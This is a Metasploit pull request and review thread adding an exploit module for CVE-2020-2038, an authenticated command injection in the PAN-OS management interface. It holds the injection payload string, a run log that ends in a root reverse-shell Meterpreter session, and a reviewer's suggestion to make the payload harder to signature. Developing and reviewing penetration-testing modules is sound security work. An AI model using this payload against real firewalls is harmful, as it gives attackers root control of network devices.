Add PAN-OS auth command injection module (CVE-2020-2038)
rapid7/metasploit-framework pull request #16914
Opened 2022-08-16 13:52 UTC by jheysel-r7

An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated 
administrators to execute arbitrary OS commands with root privileges.
More info: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/

This PR adds a fairly straight forward module to exploit the command injection vulnerability mentioned above and return a meterpreter session.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/panos_auth_rce`
- [ ]  Set the `RHOST`, `USERNAME`, and `PASSWORD` options
- [ ] Run the module
- [ ] **Verify** the api key is obtained successfully
- [ ] Receive a meterpreter session

```
|[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/panos_auth_rce) > set rhosts 192.168.2.196
rhosts => 192.168.2.196
msf6 exploit(linux/http/panos_auth_rce) > set USERNAME admin
USERNAME => admin
msf6 exploit(linux/http/panos_auth_rce) > set PASSWORD N0tpassword!
PASSWORD => N0tpassword!
msf6 exploit(linux/http/panos_auth_rce) > run

[*] Started reverse TCP handler on 192.168.2.114:4444
[*] Authenticating...
[+] Successfully obtained api key
[*] Exploiting...
[*] Sending stage (3020772 bytes) to 192.168.2.196
[*] Meterpreter session 1 opened (192.168.2.114:4444 -> 192.168.2.196:51132) at 2022-08-16 09:01:47 -0400
[*] Command Stager progress - 100.00% done (1326/1326 bytes)
f 
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : PA-VM-10-0-0.home
OS           : Red Hat  (Linux 3.10.0-957.21.3.10.pan.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

2022-08-16 13:58 UTC, jheysel-r7 commented on documentation/modules/exploit/linux/http/panos_auth_rce.md
> +f
```suggestion

```

2022-08-16 18:55 UTC, gwillcox-r7 requested changes, later dismissed

2022-08-16 18:55 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/panos_auth_rce.md
> +
This should likely be moved down into the Vulnerable Application section. Think this will cause errors for the msftidy_docs.rb script.

2022-08-16 18:55 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/panos_auth_rce.md
> +
Also this doesn't explain the vulnerability very much? Which page is vulnerable? What parameter? Whats the CVE number? There are a lot of details missing here. Additionally to what degree do you need to authenticate? As an administrator? As a normal user?

Finally you fail to call out that you get access to the system as `root` here which is vitally important. If you did all this and got access as the `nobody` user, this would be a very different bug.

2022-08-16 18:55 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/panos_auth_rce.md
> +
Can likely put some spaces between the `<` and numbers here to make it easier to read.

```suggestion
This module exploits an authenticated OS Command Injection vulnerability in PAN-OS versions < 10.0.1, < 9.1.4 and < 9.0.10

```

2022-08-16 18:55 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/panos_auth_rce.md
> +
Umm isn't this the firewall and not the OS? Might need some more info here to tie this into how you are meant to use this to get access to PAN-OS itself as the tie here is not obvious. I am also pointing this out as I'm not sure if this was left over from another module given the current explanation, but feel free to correct me if I am wrong.

2022-08-16 18:55 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/panos_auth_rce.md
> +1. Install the application
Given the complexity of this target and potential for the need to have specific configurations for various exploits, I'd like to see some more information on setting up a target here vs just a "draw the rest of the owl" type of one liner like this.

Any chance we could get even a brief tutorial? I'm happy to assist on writing this up, just don't think its appropriate to not include at least some information here.

2022-08-16 18:55 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/panos_auth_rce.md
> +
Extra space at end of the documentation file can likely be eliminated, but still need to include one blank line at end of the file:

```suggestion

```

2022-08-16 18:55 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/panos_auth_rce.md
> +1. Receive a meterpreter session
Need to explain the user you get the session as to provide context.
```suggestion
1. Receive a Meterpreter session as the `root` user.
```

2022-08-16 18:55 UTC, gwillcox-r7 commented on modules/exploits/linux/http/panos_auth_rce.rb
> +          PAN-OS 10.0 versions earlier than 10.0.1.
Have you run this against a linter? The formatting here is very odd and you have a mix of long lines and lines that could likely be merged into one line. I'd look at reformatting this to be easier to read in smaller consoles.

2022-08-16 18:55 UTC, gwillcox-r7 commented on modules/exploits/linux/http/panos_auth_rce.rb
> +          'Mikhail Klyuchnikov and Nikita Abramov', # Vulnerability discovery
Split this into two authors. This isn't a single author.
```suggestion
          'Mikhail Klyuchnikov', # Vulnerability discovery
          'Nikita Abramov', # Vulnerability discovery
```

2022-08-16 18:55 UTC, gwillcox-r7 commented on modules/exploits/linux/http/panos_auth_rce.rb
> +          An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated administrators to execute arbitrary OS commands with root privileges.
```suggestion
          A command injection vulnerability in the PAN-OS management interface allows authenticated administrators to execute arbitrary OS commands with root privileges.
```

2022-08-16 18:55 UTC, gwillcox-r7 commented on modules/exploits/linux/http/panos_auth_rce.rb
> +          'UnD3sc0n0c1d0',                          # Exploit
Where is the PoC link? I don't see it in the attributions here.

2022-08-16 18:55 UTC, gwillcox-r7 commented on modules/exploits/linux/http/panos_auth_rce.rb
> +          ['URL', 'https://security.paloaltonetworks.com/CVE-2020-2038']
Suggestion for adding PoC exploit attribution:
```suggestion
          ['URL', 'https://security.paloaltonetworks.com/CVE-2020-2038'],
          ['URL', 'https://github.com/und3sc0n0c1d0/CVE-2020-2038'] # Exploit
```

2022-08-16 18:55 UTC, gwillcox-r7 commented on modules/exploits/linux/http/panos_auth_rce.rb
> +          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
Is ARTIFACTS_ON_DISK needed? Think this is only used if we leave stuff on disk after the exploit is finished from what I can tell.

2022-08-16 18:55 UTC, gwillcox-r7 commented on modules/exploits/linux/http/panos_auth_rce.rb
> +        OptString.new('PASSWORD', [false, 'Password for username', 'admin'])
Any username, or admin specifically?

2022-08-16 18:55 UTC, gwillcox-r7 commented on modules/exploits/linux/http/panos_auth_rce.rb
> +
Any way to add a `check` method into this exploit to detect if the target is vulnerable or not? A lot of the code in `api_key` would likely be applicable to the checks here which made me think of this.

2022-08-16 18:55 UTC, gwillcox-r7 commented on modules/exploits/linux/http/panos_auth_rce.rb
> +    payload = "<cms-ping><host>8.8.8.8</host><count>1</count><pattern>111<![CDATA[||#{cmd}||]]></pattern></cms-ping>"
Can we randomize some of these values at all? Otherwise this might be fairly easy to signature.

2022-08-17 00:26 UTC, adfoster-r7 commented on modules/exploits/linux/http/panos_auth_rce.rb
> +          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
I believe this is using the cmd stagers which write to disk 👀

2022-08-17 18:19 UTC, jheysel-r7 commented on modules/exploits/linux/http/panos_auth_rce.rb
> +    payload = "<cms-ping><host>8.8.8.8</host><count>1</count><pattern>111<![CDATA[||#{cmd}||]]></pattern></cms-ping>"
I'll see what can be randomized here, good call 👍

2022-08-17 18:19 UTC, jheysel-r7 commented on modules/exploits/linux/http/panos_auth_rce.rb
> +
I could move this to a check method that once authenticated, could grab version information to determine if PAN-OS is vulnerable.

2022-08-17 18:19 UTC, jheysel-r7 commented on modules/exploits/linux/http/panos_auth_rce.rb
> +        OptString.new('PASSWORD', [false, 'Password for username', 'admin'])
Administrators specifically, thanks for catching this!

2022-08-17 18:29 UTC, jheysel-r7 commented on documentation/modules/exploit/linux/http/panos_auth_rce.md
> +
I did write this. PAN‑OS is the software that runs all Palo Alto Networks next-generation firewalls. I was able to get a copy of a VM internally. I believe if someone wants to obtain a copy of PAN-OS they have to sign up and request a demo. I'll add a bit more detail here.

2022-08-17 18:31 UTC, jheysel-r7 commented on documentation/modules/exploit/linux/http/panos_auth_rce.md
> +1. Install the application
This was copied from else where and I do agree it is too vague. Although - the virtual machine that you get from Palo Alto is a Red Hat VM with PAN-OS already running on top of it. There isn't much configuration necessary, apart for possibly some networking configuration although VMware Fusion handled that for me, running on something else like VirtualBox might be different.

I was able to browse to the web interface as soon as I powered up the VM for the first time. I also don't like it when installation instructions are glossed over although I don't _think_ much more needs to be said here. I would be happy to add more details if you think of any when you spin this up. Thanks for pointing this out!

2022-08-17 21:50 UTC, jheysel-r7 commented on modules/exploits/linux/http/panos_auth_rce.rb
> +
I've added a check method which queries the API to fetch version info. While doing this I made `@api_key`, an instance variable that gets defined in the check method, so we don't have retrieve the api key twice, once in the check and exploit method. Let me know if there's a preferred way to implement this.

2022-08-17 22:42 UTC, wvu commented
Nice job, Jack!!!

2022-08-18 13:37 UTC, jheysel-r7 commented
> Nice job, Jack!!!

Thanks Will!! :)

2022-08-18 14:45 UTC, smcintyre-r7 approved these changes

2022-08-18 14:45 UTC, smcintyre-r7 commented on modules/exploits/linux/http/panos_auth_rce.rb
> +##
`panos_auth_rce` is a bit of a generic name. There could be another authenticated RCE vulnerability in the future that affects panos. I'd suggest either incorporating the CVE into the name or making it more specific to the vulnerability that's being exploited like `panos_op_cmd_exec`.

2022-08-18 14:45 UTC, smcintyre-r7 commented on modules/exploits/linux/http/panos_auth_rce.rb
> +        ],
You can combine the architectures for the Linux platform here into one. This will allow the user to select either x64 or x86 payloads when using this target. You can see an example of multiple architectures being specified in a target in the [psexec](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/psexec.rb#L66) module.

```suggestion
        'Platform' => 'linux',
        'Privileged' => true,
        'Targets' => [
          [
            'Linux',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'CmdStagerFlavor' => %i[echo printf]
            }
          ]
```

Is it possible to also add an `ARCH_CMD` target? There doesn't appear to be any character or length restrictions on the payload.

2022-08-18 14:45 UTC, smcintyre-r7 commented on modules/exploits/linux/http/panos_auth_rce.rb
> +        OptBool.new('SSL', [true, 'Use SSL', true]),
These could be moved into the DefaultOptions hash where WfsDelay is. In the case of the SSL option, the advantage is that the description from the mixin is kept.

2022-08-18 14:45 UTC, smcintyre-r7 commented on modules/exploits/linux/http/panos_auth_rce.rb
> +    @api_key = api_key
Since `#api_key` is using `fail_with`, there needs to be exception handling here to return a CheckCode.

2022-08-18 14:45 UTC, smcintyre-r7 commented on modules/exploits/linux/http/panos_auth_rce.rb
> +    key = xml.xpath('/response/result/key').text
```suggestion
    key = res.get_xml_document.xpath('/response/result/key')&.text
```

2022-08-18 14:45 UTC, smcintyre-r7 commented on modules/exploits/linux/http/panos_auth_rce.rb
> +    res = send_request_cgi({
Missing a check on `res` here. Should check that and handle it in case the API key was returned but this request failed.

2022-08-18 14:45 UTC, smcintyre-r7 commented on modules/exploits/linux/http/panos_auth_rce.rb
> +    version = Rex::Version.new(xml.xpath('/response/result/sw-version').text)
```suggestion
    version = Rex::Version.new(res.get_xml_document.xpath('/response/result/sw-version').text)
```

2022-08-18 20:19 UTC, jheysel-r7 commented on modules/exploits/linux/http/panos_auth_rce.rb
> +##
Totally agree, thanks for pointing this out. Changed to `panos_op_cmd_exec`

2022-08-29 23:20 UTC, gwillcox-r7 commented
Removing assignment. @jheysel-r7 et al, feel free to grab this one since I'm on research now.

2022-09-12 12:05 UTC, cdelafuente-r7 reviewed
Thanks @jheysel-r7 for this great module! I left a few comments for you to review when you get a chance.

2022-09-14 14:52 UTC, cdelafuente-r7 commented on modules/exploits/linux/http/panos_op_cmd_exec.rb
> +      'uri' => normalize_uri(target_uri.path, 'api/?'),
I don't think the question mark `?` is needed since `send_request_cgi` should take care of adding the provided parameters corectly. I checked with `HTTPTRACE` enabled and confirmed two `??` were present in the request:
```
...
[+] Successfully obtained api key
####################
# Request:
####################
GET /api/??cmd=%23%3cMsf%3a%3aEncodedPayload%3a0x00007fa8f7791d80%3e&type=version&key=<redacted> HTTP/1.1
Host: 192.168.1.40
User-Agent: Mozilla/5.0 (iPad; CPU OS 15_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Mobile/15E148 Safari/604.1
...
```

```suggestion
      'uri' => normalize_uri(target_uri.path, 'api/'),
```

2022-09-14 14:52 UTC, cdelafuente-r7 commented on modules/exploits/linux/http/panos_op_cmd_exec.rb
> +        'key' => @api_key
I'm not sure to understand these parameters value. I believe `version` is the command (`cmd`) and, according to the request sent in `execute_command`, `type` should be `op`.

Also, assuming the this call will execute the `version` command, if it succeed, this means the system is vulnerable and there is no need to check the actual version. That said, we usually do this kind of "active" check to confirm the system is vulnerable by issuing something like `echo <random string>` and checking the response to confirm the command has been executed.

2022-09-14 14:52 UTC, cdelafuente-r7 commented on modules/exploits/linux/http/panos_op_cmd_exec.rb
> +      return Exploit::CheckCode::Safe
`Checkcode` objects accept a string that will be displayed to the user along with the specific `Checkcode` description:
```suggestion
      return Exploit::CheckCode::Safe.new("Error retrieving API key: #{e.class}, #{e}")
```

2022-09-14 16:50 UTC, jheysel-r7 commented on modules/exploits/linux/http/panos_op_cmd_exec.rb
> +    fail_with(Failure::UnexpectedReply, 'The API did not respond to the request for the version of PAN_OS') unless res&.body
Oops, how did I miss that one. Thanks Christophe 🙇

2022-09-14 16:58 UTC, jheysel-r7 commented on modules/exploits/linux/http/panos_op_cmd_exec.rb
> +        'key' => @api_key
Sorry for the confusion, this is not actually exploiting the vulnerability here. This is using the built version function in the API which can be accessed once authenticated to determine the version:
https://docs.paloaltonetworks.com/pan-os/9-1/pan-os-panorama-api/pan-os-xml-api-request-types/get-version-info-api

The version was easy to retrieve in this way so I figured it would be best do it this way to avoid throwing exploitation attempts at patched versions. That being said, i won't mind making any changes, just let me know!

2022-09-14 16:59 UTC, jheysel-r7 commented on modules/exploits/linux/http/panos_op_cmd_exec.rb
> +      'uri' => normalize_uri(target_uri.path, 'api/?'),
Ahh, great catch!

2022-09-15 11:47 UTC, cdelafuente-r7 commented on modules/exploits/linux/http/panos_op_cmd_exec.rb
> +        'key' => @api_key
Oh ok, thanks for the clarification. So, in this case, I believe the `cmd` parameter should not be sent?

Also, `'cmd' => payload` will set `cmd` to the payload object, which is defined globally:
```
[1] pry(#<Msf::Modules::Exploit__Linux__Http__Panos_op_cmd_exec::MetasploitModule>)> payload.class
=> Msf::EncodedPayload
[2] pry(#<Msf::Modules::Exploit__Linux__Http__Panos_op_cmd_exec::MetasploitModule>)> payload.to_s
=> "#<Msf::EncodedPayload:0x00007f96caedb490>"
```

Which will be sent like this:
```
GET /api/?cmd=%23%3cMsf%3a%3aEncodedPayload%3a0x00007f968af73af0%3e&type=version&...
```

2022-09-15 12:01 UTC, cdelafuente-r7 commented on modules/exploits/linux/http/panos_op_cmd_exec.rb
> +       version.eql?(Rex::Version.new('10.0.0'))
According to the [advisory](https://security.paloaltonetworks.com/CVE-2020-2038), these versions looks wrong. I tested against PAN-OS 9.1.3 and I confirmed it is vulnerable.

Versions | Affected | Unaffected
-- | -- | --
PAN-OS 10.0 | < 10.0.1 | >= 10.0.1
PAN-OS 9.1 | < 9.1.4 | >= 9.1.4
PAN-OS 9.0 | < 9.0.10 | >= 9.0.10
PAN-OS 8.1 | None | 8.1.*

```suggestion
    if version >= Rex::Version.new('9.0.0') && version < Rex::Version.new('9.0.10') ||
       version >= Rex::Version.new('9.1.0') && version < Rex::Version.new('9.1.4') ||
       version >= Rex::Version.new('10.0.0') && version < Rex::Version.new('10.0.1')
```

2022-09-15 12:02 UTC, cdelafuente-r7 commented on modules/exploits/linux/http/panos_op_cmd_exec.rb
> +      return Exploit::CheckCode::Vulnerable
Since only the version is checked, the `CheckCode` should be `Appears`. Here is a more detailed description of each `CheckCode`: https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-write-a-check-method.html#check-codes.

`Vulnerable` is used when actively checking for the bug. For example, sending a `echo <random string?` and checking if the string is part of the response.

2022-09-15 15:58 UTC, merged

2022-09-15 16:01 UTC, cdelafuente-r7 commented
# Release Notes
This adds an exploit module that leverages an OS Command Injection vulnerability in the PAN-OS management interface versions 10.0 to 10.0.1, versions 9.1.0 to 9.1.4 and version 9.0.0 to 9.0.10. This allows authenticated administrators to execute arbitrary OS commands with root privileges.